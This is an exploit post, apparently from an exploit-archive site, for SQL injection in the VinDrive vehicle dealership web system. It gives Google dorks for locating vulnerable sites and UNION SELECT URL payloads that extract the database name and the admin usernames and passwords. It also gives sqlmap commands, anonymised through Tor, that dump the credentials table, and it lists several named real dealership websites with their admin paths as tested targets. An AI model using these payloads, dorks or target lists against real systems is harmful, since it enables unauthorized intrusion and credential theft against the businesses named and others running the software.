VinDrive SQL Injecti0n Vulnerability - Manually AND sqlmap

2016.09.20
ir Saman.khan@xtra.co.nz (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: " allinurl:search/make_offer_form.php?id= "

########################## # Exploit Title: VinDrive SQL Injecti0n Vulnerability - Manually AND sqlmap # Google Dork 1: " allinurl:search/make_offer_form.php?id= " # Google Dork 2: " VinDrive inurl:/search/results.php " # Google Dork 3: " inurl:results.php?_s_col= # Script Name: VinDrive - Vehicle Marketing System - Dealership website www.dealerwebsites.com # Data: 12-09-2016 # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: Hacker Khan # Tested on : Windows ########################## ######[ Exploit ]###### (( Manually )) To See /column numbers : ( GONNA BE 3,4,5 <-- ) make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 To See /Database Name : ( Database Name will be : dealer62_XXX( SOMENAME ) make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 To See /Admin Username and Password : ( Replace XXXX with the name of data ) make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from dealer62_XXXX.cars_dealers ----------- DONE ------------- ######[ Exploit ]###### (( SQLMAP )) sqlmap -u "http://www.Target/search/details.php?id=511" -v 1 --random-agent --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor --dbs sqlmap -u "http://www.Target/search/details.php?id=511" -v 1 --random-agent --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -D dealer62_XXXX --tables -T cars_dealers -C username,password --dump ----------- DONE ------------- ADMIN PAGE : http://www.TarGet/search/admin/ Enjoy ! tested on : http://www.abcmotors.com/search/admin/ http://www.spacecoastauto.com/search/admin/ www.jclautos.com/search/admin/ www.fcautoconnection.com/search/admin/ http://www.greatlittlecars.com/search/admin/ http://www.sunshine-automotive.com/search/admin/ ################################### #Thanks to : MR.Khatar || ll_azab-siyah_ll || Blackwolf_Iran ||Ormazd ||Sh@d0w ||mohammad Pn ||Shdmehr || And All Of Iranian Anonymous . # Discovered By: Hacker Khan

References:

Saman.khan@xtra.co.nz


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top